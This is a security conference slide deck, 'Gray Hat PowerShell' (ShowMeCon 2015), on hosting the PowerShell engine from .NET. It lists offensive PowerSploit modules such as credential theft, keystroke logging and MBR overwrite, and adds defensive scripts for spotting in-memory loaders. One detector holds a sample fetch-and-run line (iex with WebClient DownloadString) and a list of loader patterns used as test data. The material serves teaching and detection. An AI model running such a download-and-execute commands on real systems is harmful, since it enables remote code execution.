Date posted: 31-Jul-2015 | Category: Technology | Uploaded by: ben-ten-0xa
Gray Hat PowerShell
Ben Ten (@Ben0xA)
Slides: http://www.slideshare.net/BenTen0xA
ShowMeCon 2015
About Me
Ben Ten (0xA)@Ben0xA - twitter
● Chicago - #burbsec
● Security Consultant
● Developer
● PoshSec Framework Creator
● Gamer
● Geek
Gray Hat PowerShell - ShowMeCon 2015 - Ben Ten (@Ben0xA)
Thank You!
About This Talk
DISCLAIMER!
[two paragraphs of Lorem Ipsum placeholder text on the slide]
Yes, I know it's Lorem Ipsum….
DISCLAIMER!
● Please do not use any of these tools, techniques, or code on any system that you do not own or otherwise have permission to use.
● Some of these things can damage systems!
This Talk is Not:
● An introduction to PowerShell
● Able to cover the wide array of techniques and code available in 45 minutes
About This Talk
Practical PowerShell Programming for Professional People
http://ben0xa.com
-or-
https://youtube.com/watch?v=4X_uBL2YpmA
Overview
● Under the .NET Hood
● Offense Tools
● Defense Tools
● Resources
● Q&A
● Hugs – if you want them!
Under the .NET Framework Hood
Before you create any tool, regardless of your intent, you need to understand what you are building your tool upon.
PowerShell sits directly on the Microsoft .NET Framework.
PowerShell is NOT powershell.exe
powershell.exe is just a host application. It hosts the assembly that contains PowerShell and handles I/O: System.Management.Automation.dll
Demo
The Code
# Create an engine instance inside this process; no new powershell.exe is involved.
$ps = [powershell]::Create()
# Queue a cmdlet on the pipeline, then run it.
$ps.AddCommand("Get-ChildItem")
$ps.Invoke()
# Reset the pipeline and run an arbitrary script string instead.
$ps.Commands.Clear()
$ps.AddScript("Write-Output `"Hey there ShowMeCon!`"; Get-ChildItem;")
$ps.Invoke()
Demo #2
The Code
The AwesomerShell code is available on ben0xa.com
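The same fact seen from the defender's side, as an added example (not code from the slides or from AwesomerShell): because the engine lives in System.Management.Automation.dll, any .NET process can host it, so this function lists every process that has the assembly loaded and flags hosts other than the expected ones. The KnownHost list is an assumption to tune for your own environment.

```powershell
# Added example, not from the slides. Look for the engine assembly wherever it
# is loaded instead of looking for the process name powershell.exe.
function Find-PowerShellHost {
    param(
        # Hosts that normally load the engine; assumption, adjust for your fleet.
        [string[]]$KnownHost = @('powershell', 'powershell_ise')
    )
    foreach ($proc in Get-Process) {
        try {
            # Reading Modules of protected or other-bitness processes throws; skip them.
            $mods = $proc.Modules
        } catch {
            continue
        }
        # NGEN'd copies appear as System.Management.Automation.ni.dll, so match loosely.
        $engine = $mods |
            Where-Object { $_.ModuleName -like 'System.Management.Automation*.dll' } |
            Select-Object -First 1
        if ($engine) {
            [pscustomobject]@{
                ProcessName = $proc.ProcessName
                Id          = $proc.Id
                EnginePath  = $engine.FileName
                Unexpected  = ($KnownHost -notcontains $proc.ProcessName)
            }
        }
    }
}

# Hosts other than the expected ones deserve a closer look.
Find-PowerShellHost | Where-Object { $_.Unexpected } | Format-Table -AutoSize
```

Run it from an elevated session of the same bitness as the processes you care about, otherwise many Modules reads are skipped.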
Offense Tools
● PowerSploit: Matt Graeber (@mattifestation), Chris Campbell (@obscuresec)
● Veil-PowerView / PowerUp: Will Schroeder (@harmj0y)
● Posh-SecMod: Carlos Perez (@darkoperator)
PowerSploit
Add-Persistence
Find-4624Logons
Find-4648Logons
Find-AppLockerLogs
Find-AVSignature
Find-PSScriptsInPSAppLog
Find-RDPClientConnections
Get-ComputerDetails
Get-GPPPassword
Get-HttpStatus
Get-Keystrokes
Get-SecurityPackages
Get-TimedScreenshot
Get-VaultCredential
Get-VolumeShadowCopy
Install-SSP
Invoke-CredentialInjection
Invoke-DllInjection
Invoke-Mimikatz
Invoke-NinjaCopy
Invoke-PortScan
Invoke-ReflectivePEInjection
Invoke-ReverseDNSLookup
Invoke-Shellcode
Invoke-ShellcodeMSIL
Invoke-TokenManipulation
Mount-VolumeShadowCopy
New-ElevatedPersistenceOption
New-UserPersistenceOption
Out-CompressedDll
Out-EncodedCommand
Out-EncryptedScript
Out-Minidump
Remove-Comments
Set-CriticalProcess
Set-MasterBootRecord
STOP!
Invoke-Expression (iex)
Loads Directly in Memory – No Disk I/O
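Added example, not from the slides: an Invoke-Expression loader leaves nothing on disk, so the record a defender still has is what the engine itself logs. PowerShell 5 script block logging (event 4104 in Microsoft-Windows-PowerShell/Operational) keeps the text that was compiled; this matcher flags blocks that look like in-memory loading. The pattern list and the two constructed sample strings are assumptions.

```powershell
# Added example, not from the slides. Patterns are an assumption; extend for your environment.
$LoaderPatterns = @(
    'Invoke-Expression',
    '\biex\b',
    'DownloadString',
    'Net\.WebClient',
    'FromBase64String',
    '-EncodedCommand'
)

function Test-InMemoryLoader {
    param([Parameter(Mandatory=$true)][string]$ScriptBlockText)
    # Returns the patterns that matched; empty when the block looks benign.
    $LoaderPatterns | Where-Object { $ScriptBlockText -match $_ }
}

function Find-InMemoryLoaderEvent {
    param([int]$MaxEvents = 500)
    Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104
    } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue | ForEach-Object {
        # Property index 2 of a 4104 event is the ScriptBlockText field.
        $text = [string]$_.Properties[2].Value
        $hits = @(Test-InMemoryLoader -ScriptBlockText $text)
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                Time    = $_.TimeCreated
                Matched = ($hits -join ', ')
                Snippet = $text.Substring(0, [Math]::Min(120, $text.Length))
            }
        }
    }
}

# Constructed sample inputs so the matcher can be checked without an event log.
$samples = @(
    'Get-ChildItem C:\Windows | Measure-Object',
    'iex (New-Object Net.WebClient).DownloadString("http://example.invalid/x.ps1")'
)
$samples | ForEach-Object { "$_ => $(@(Test-InMemoryLoader $_) -join ', ')" }
```

Script block logging has to be enabled (Group Policy or the ScriptBlockLogging registry key) before 4104 events exist to query.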
Demo #3
Defense Tools
● PoshSec: Matt Johnson (@mwjcomputing), Ben Ten (@ben0xa)
● Kansa: Dave Hull (@davehull)
● Invoke-IR / PowerForensics: Jared Atkinson (@jaredcatkinson)
Demo #4
Resources
● PowerSploit: https://github.com/mattifestation/PowerSploit
● Veil-PowerView / PowerUp: https://github.com/veil-framework/
● Posh-SecMod: https://github.com/darkoperator/
● PoshSec: https://github.com/poshsec
● Kansa: https://github.com/davehull
● Invoke-IR / PowerForensics: https://github.com/invoke-ir
Q&A
Ben Ten (0xA)
@Ben0xA - twitter
http://ben0xa.com
[email protected] – LinkedIn, Github, keybase, etc.
irc.freenode.net: #burbsec, #poshsec, #pssec
http://www.slideshare.net/BenTen0xA